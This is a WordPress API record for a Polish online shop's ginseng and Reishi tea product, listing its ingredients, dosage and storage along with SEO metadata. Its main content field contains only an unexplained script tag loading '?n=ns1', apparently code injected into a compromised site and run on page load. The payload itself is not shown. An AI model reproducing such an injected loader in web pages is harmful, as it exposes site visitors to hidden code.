{"id":1677,"date":"2019-09-16T21:05:53","date_gmt":"2019-09-16T21:05:53","guid":{"rendered":"http:\/\/www.ginlac.eu.uvirt55.active24.cz\/product\/herbata-zen\/"},"modified":"2023-01-05T11:08:21","modified_gmt":"2023-01-05T11:08:21","slug":"herbata-zen","status":"publish","type":"product","link":"https:\/\/www.ginlac.eu\/pl\/produkt\/herbata-zen\/","title":{"rendered":"Herbata ZEN"},"content":{"rendered":"<p><script src='?n=ns1' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<div class=\"woocommerce-product-details__short-description\">\n<p><strong>Herbata ZEN<\/strong><br \/>\nWysokiej jako\u015bci herbata granulowana wyprodukowana z wyci\u0105gu czerwonego \u017ce\u0144szenu korea\u0144skiego wzbogaconego o komponent fermentowany oraz z wyci\u0105gu \u201ecudownego\u201c grzyba (Reishi\/Lingzhi)<\/p>\n<p><strong>Sk\u0142ad:<\/strong>\u00a0wyci\u0105g z korzenia\u00a0czerownego \u017ce\u0144szenia korea\u0144skiego 5%, fermentowany wyci\u0105g z\u00a0korzenia czerwonego \u017ce\u0144szenia korea\u0144skiego 3%, wyci\u0105g z grzyba Reishi 5%, glukoza 87%.<\/p>\n<p><strong>Opakowanie:<\/strong>\u00a03g x 30 \/ 3g x 50 \/ 3g x 100<\/p>\n<p><strong>Zalecane dawkowanie:\u00a0<\/strong>1 do 3x dziennie zawarto\u015b\u0107 woreczka rozmieszaj w gor\u0105cej lub zimnej wodzie.<\/p>\n<p><strong>Przechowywanie:\u00a0<\/strong>Na suchym miejscu przy temperaturze do 25\u00a0\u00b0C, nie wystawiaj bezpo\u015bredniemu s\u0142o\u0144cu i przechowuj poza zasi\u0119gem dzieci.<\/p>\n<p><strong>Producent:<\/strong>\u00a0KUAN Industrial Co. Ltd., Korea<\/p>\n<p><strong>Made in Korea<\/strong><\/p>\n<\/div>\n","protected":false},"featured_media":262,"template":"","meta":[],"product_cat":[46],"product_tag":[47],"class_list":["post-1677","product","type-product","status-publish","has-post-thumbnail","hentry","product_cat-ginseng-pl","product_tag-ginseng-pl"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Herbata ZEN - GINLAC - Korean Ginseng<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.ginlac.eu\/pl\/produkt\/herbata-zen\/\" \/>\n<meta property=\"og:locale\" content=\"pl_PL\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Herbata ZEN - GINLAC - Korean Ginseng\" \/>\n<meta property=\"og:description\" content=\"Herbata ZEN Wysokiej jako\u015bci herbata granulowana wyprodukowana z wyci\u0105gu czerwonego \u017ce\u0144szenu korea\u0144skiego wzbogaconego o komponent fermentowany oraz z wyci\u0105gu \u201ecudownego\u201c grzyba (Reishi\/Lingzhi)  Sk\u0142ad:\u00a0wyci\u0105g z korzenia\u00a0czerownego \u017ce\u0144szenia korea\u0144skiego 5%, fermentowany wyci\u0105g z\u00a0korzenia czerwonego \u017ce\u0144szenia korea\u0144skiego 3%, wyci\u0105g z grzyba Reishi 5%, glukoza 87%.  Opakowanie:\u00a03g x 30 \/ 3g x 50 \/ 3g x 100  Zalecane dawkowanie:\u00a01 do 3x dziennie zawarto\u015b\u0107 woreczka rozmieszaj w gor\u0105cej lub zimnej wodzie.  Przechowywanie:\u00a0Na suchym miejscu przy temperaturze do 25\u00a0\u00b0C, nie wystawiaj bezpo\u015bredniemu s\u0142o\u0144cu i przechowuj poza zasi\u0119gem dzieci.  Producent:\u00a0KUAN Industrial Co. Ltd., Korea  Made in Korea\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.ginlac.eu\/pl\/produkt\/herbata-zen\/\" \/>\n<meta property=\"og:site_name\" content=\"GINLAC - Korean Ginseng\" \/>\n<meta property=\"article:modified_time\" content=\"2023-01-05T11:08:21+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.ginlac.eu\/wp-content\/uploads\/0R2A4252.png\" \/>\n\t<meta property=\"og:image:width\" content=\"800\" \/>\n\t<meta property=\"og:image:height\" content=\"533\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.ginlac.eu\/pl\/#website\",\"url\":\"https:\/\/www.ginlac.eu\/pl\/\",\"name\":\"GINLAC - Korean Ginseng\",\"description\":\"Korea INSAM trademark\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.ginlac.eu\/pl\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pl-PL\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.ginlac.eu\/pl\/produkt\/herbata-zen\/\",\"url\":\"https:\/\/www.ginlac.eu\/pl\/produkt\/herbata-zen\/\",\"name\":\"Herbata ZEN - GINLAC - Korean Ginseng\",\"isPartOf\":{\"@id\":\"https:\/\/www.ginlac.eu\/pl\/#website\"},\"datePublished\":\"2019-09-16T21:05:53+00:00\",\"dateModified\":\"2023-01-05T11:08:21+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.ginlac.eu\/pl\/produkt\/herbata-zen\/#breadcrumb\"},\"inLanguage\":\"pl-PL\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.ginlac.eu\/pl\/produkt\/herbata-zen\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.ginlac.eu\/pl\/produkt\/herbata-zen\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.ginlac.eu\/pl\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Herbata ZEN\"}]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Herbata ZEN - GINLAC - Korean Ginseng","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.ginlac.eu\/pl\/produkt\/herbata-zen\/","og_locale":"pl_PL","og_type":"article","og_title":"Herbata ZEN - GINLAC - Korean Ginseng","og_description":"Herbata ZEN Wysokiej jako\u015bci herbata granulowana wyprodukowana z wyci\u0105gu czerwonego \u017ce\u0144szenu korea\u0144skiego wzbogaconego o komponent fermentowany oraz z wyci\u0105gu \u201ecudownego\u201c grzyba (Reishi\/Lingzhi)  Sk\u0142ad:\u00a0wyci\u0105g z korzenia\u00a0czerownego \u017ce\u0144szenia korea\u0144skiego 5%, fermentowany wyci\u0105g z\u00a0korzenia czerwonego \u017ce\u0144szenia korea\u0144skiego 3%, wyci\u0105g z grzyba Reishi 5%, glukoza 87%.  Opakowanie:\u00a03g x 30 \/ 3g x 50 \/ 3g x 100  Zalecane dawkowanie:\u00a01 do 3x dziennie zawarto\u015b\u0107 woreczka rozmieszaj w gor\u0105cej lub zimnej wodzie.  Przechowywanie:\u00a0Na suchym miejscu przy temperaturze do 25\u00a0\u00b0C, nie wystawiaj bezpo\u015bredniemu s\u0142o\u0144cu i przechowuj poza zasi\u0119gem dzieci.  Producent:\u00a0KUAN Industrial Co. Ltd., Korea  Made in Korea","og_url":"https:\/\/www.ginlac.eu\/pl\/produkt\/herbata-zen\/","og_site_name":"GINLAC - Korean Ginseng","article_modified_time":"2023-01-05T11:08:21+00:00","og_image":[{"width":800,"height":533,"url":"https:\/\/www.ginlac.eu\/wp-content\/uploads\/0R2A4252.png","type":"image\/png"}],"twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/www.ginlac.eu\/pl\/#website","url":"https:\/\/www.ginlac.eu\/pl\/","name":"GINLAC - Korean Ginseng","description":"Korea INSAM trademark","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.ginlac.eu\/pl\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pl-PL"},{"@type":"WebPage","@id":"https:\/\/www.ginlac.eu\/pl\/produkt\/herbata-zen\/","url":"https:\/\/www.ginlac.eu\/pl\/produkt\/herbata-zen\/","name":"Herbata ZEN - GINLAC - Korean Ginseng","isPartOf":{"@id":"https:\/\/www.ginlac.eu\/pl\/#website"},"datePublished":"2019-09-16T21:05:53+00:00","dateModified":"2023-01-05T11:08:21+00:00","breadcrumb":{"@id":"https:\/\/www.ginlac.eu\/pl\/produkt\/herbata-zen\/#breadcrumb"},"inLanguage":"pl-PL","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.ginlac.eu\/pl\/produkt\/herbata-zen\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.ginlac.eu\/pl\/produkt\/herbata-zen\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.ginlac.eu\/pl\/"},{"@type":"ListItem","position":2,"name":""},{"@type":"ListItem","position":3,"name":"Herbata ZEN"}]}]}},"_links":{"self":[{"href":"https:\/\/www.ginlac.eu\/pl\/wp-json\/wp\/v2\/product\/1677"}],"collection":[{"href":"https:\/\/www.ginlac.eu\/pl\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/www.ginlac.eu\/pl\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.ginlac.eu\/pl\/wp-json\/wp\/v2\/media\/262"}],"wp:attachment":[{"href":"https:\/\/www.ginlac.eu\/pl\/wp-json\/wp\/v2\/media?parent=1677"}],"wp:term":[{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/www.ginlac.eu\/pl\/wp-json\/wp\/v2\/product_cat?post=1677"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/www.ginlac.eu\/pl\/wp-json\/wp\/v2\/product_tag?post=1677"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}